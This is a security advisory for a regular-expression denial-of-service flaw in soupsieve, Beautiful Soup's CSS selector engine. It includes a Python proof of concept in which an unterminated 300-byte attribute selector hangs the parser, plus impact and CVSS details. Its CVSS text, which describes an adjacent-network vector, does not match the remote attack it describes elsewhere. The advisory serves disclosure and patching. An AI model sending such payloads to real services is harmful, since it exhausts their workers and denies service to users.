CVE-2026-49477

ADVISORY - github

Summary

Summary

The CSS selector parser in soupsieve (the CSS selector engine for Beautiful Soup 4) contains a regular expression vulnerable to catastrophic backtracking. When processing an attribute selector with an unterminated quoted value, the VALUE regex pattern in css_parser.py enters exponential backtracking. A payload of only 300 bytes causes the regex engine to hang for over 3 seconds, enabling a trivial Regular Expression Denial of Service (ReDoS) attack.

To be completely transparent, AI tools helped surface this issue. However, this was independently reproduced and carefully validated.

Any application that passes untrusted CSS selector strings to soupsieve.compile() or Beautiful Soup's .select() / .select_one() is affected.

Details

Affected code: soupsieve/css_parser.py, line ~121 - RE_VALUES / VALUE regex pattern

The soupsieve CSS parser uses a compiled regular expression to tokenise attribute selector values. This pattern matches both quoted strings ("value" or 'value') and unquoted identifiers. The regex contains alternation branches for:

  1. Double-quoted strings: "[^"\\]*(?:\\.[^"\\]*)*"
  2. Single-quoted strings: '[^'\\]*(?:\\.[^'\\]*)*'
  3. Unquoted identifiers

When an attribute selector contains an unterminated quoted value - e.g., [a="xxxx... (opening " but no closing ") -” the regex engine attempts to match the quoted-string branch. After that branch fails (no closing quote), the engine backtracks and attempts to match the remaining input against subsequent alternation branches and parent patterns. The structure of the pattern causes catastrophic backtracking where the number of backtracking steps grows exponentially with the length of the content between the opening quote and the end of the string.

Root cause: The regex pattern does not anchor or guard against the case where a quoted string is never terminated. The overlapping character classes across alternation branches create exponential backtracking when the quoted-string branch fails on long input.

Key characteristics:

  • Input size: Only 300 bytes are needed to trigger a >3 second hang
  • Amplification: Each additional character approximately doubles the backtracking time
  • No memory impact: The attack consumes CPU only (regex backtracking is compute-bound)

Proof of Concept

import time
import soupsieve as sv

PAYLOAD_LEN = 300

# Control: well-formed selector with terminated quote (completes instantly)
well_formed = '[a="' + ('x' * PAYLOAD_LEN) + '"]'
start = time.perf_counter()
try:
    sv.compile(well_formed)
except Exception:
    pass
control_time = time.perf_counter() - start
print(f"Well-formed selector ({len(well_formed)} bytes): {control_time:.4f}s")

# Exploit: unterminated quote triggers catastrophic regex backtracking
malformed = '[a="' + ('x' * PAYLOAD_LEN)
start = time.perf_counter()
try:
    sv.compile(malformed)  # WARNING: This will hang for >3 seconds
except Exception:
    pass
exploit_time = time.perf_counter() - start
print(f"Malformed selector ({len(malformed)} bytes): {exploit_time:.4f}s")

slowdown = exploit_time / max(control_time, 1e-9)
print(f"Slowdown: {slowdown:.0f}x")

# Expected output:
# Well-formed selector (306 bytes): ~0.001s
# Malformed selector (304 bytes): >3.0s (may need to be killed)
# Slowdown: >3000x
#
# NOTE: On some systems the malformed selector may hang indefinitely.
# Use a timeout mechanism (signal.alarm, threading.Timer) when testing.

Safe testing variant with timeout:

import signal
import soupsieve as sv

def timeout_handler(signum, frame):
    raise TimeoutError("ReDoS confirmed: regex backtracking exceeded timeout")

PAYLOAD_LEN = 300
malformed = '[a="' + ('x' * PAYLOAD_LEN)

signal.signal(signal.SIGALRM, timeout_handler)
signal.alarm(3)  # 3-second timeout

try:
    sv.compile(malformed)
    print("Selector compiled (not vulnerable)")
except TimeoutError as e:
    print(f"VULNERABLE: {e}")
except Exception as e:
    print(f"Other error: {e}")
finally:
    signal.alarm(0)  # Cancel the alarm

Impact

Severity: High

An attacker can cause CPU exhaustion on any server-side Python application that compiles user-supplied CSS selectors via soupsieve. The attack is particularly dangerous because:

  1. Tiny payload: Only 300 bytes are needed - well within typical URL parameter, form field, or API request limits
  2. No special characters: The payload consists entirely of printable ASCII characters ([a="xxx...)
  3. Exponential scaling: Each additional byte approximately doubles the backtracking time, making the attack easily tuneable
  4. Thread blocking: The regex engine blocks the calling thread with no opportunity for interruption (except via OS signals)
Parameter Value
Input size 300 bytes
CPU time consumed >3 seconds (exponential with payload length)
Memory consumed Negligible (CPU-only attack)
Authentication required None
User interaction required None

Deployment impact: In threaded or async web applications, a single malicious request blocks a worker thread for the duration of the backtracking. An attacker can submit multiple concurrent requests to exhaust all available workers, causing complete service denial. The small payload size makes the attack easy to deliver and difficult to detect via request size limits.

Downstream exposure: soupsieve is an automatic dependency of beautifulsoup4, one of the most widely installed Python packages. Any web application, API, or service that accepts CSS selectors from users is potentially affected.


Credit

The vulnerability was discovered by a security research team from the University of Sydney, whose focus is detecting open source software vulnerabilities. Liyi Zhou: https://lzhou1110.github.io/ Ziyue Wang: https://zyy0530.github.io/ Strick: https://str1ckl4nd.github.io/ Maurice: https://maurice.busystar.org/ Chenchen Yu: https://7thparkk.github.io/

Common Weakness Enumeration (CWE)

ADVISORY - github

Inefficient Regular Expression Complexity

Uncontrolled Resource Consumption


GitHub

CREATED

UPDATED

EXPLOITABILITY SCORE

3.9

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)

CVSS SCORE

7.5high
PackageTypeOS NameOS VersionAffected RangesFix Versions
soupsievepypi--<=2.8.32.8.4

CVSS:3 Severity and metrics

The CVSS metrics represent different qualitative aspects of a vulnerability that impact the overall score, as defined by the CVSS Specification.

The vulnerable component is bound to the network stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be launched from the same shared physical (e.g., Bluetooth or IEEE 802.11) or logical (e.g., local IP subnet) network, or from within a secure or otherwise limited administrative domain (e.g., MPLS, secure VPN to an administrative network zone). One example of an Adjacent attack would be an ARP (IPv4) or neighbor discovery (IPv6) flood leading to a denial of service on the local LAN segment (e.g., CVE-2013-6014).

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

The vulnerable system can be exploited without interaction from any user.

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

There is no loss of confidentiality.

There is no loss of trust or accuracy within the impacted component.

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component.

minimos

CREATED

UPDATED

ADVISORY ID

MINI-5pfr-qxr9-8qxw

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY

minimos

CREATED

UPDATED

ADVISORY ID

MINI-79mj-2544-q8fc

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY

minimos

CREATED

UPDATED

ADVISORY ID

MINI-mv5x-g7x5-mw36

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY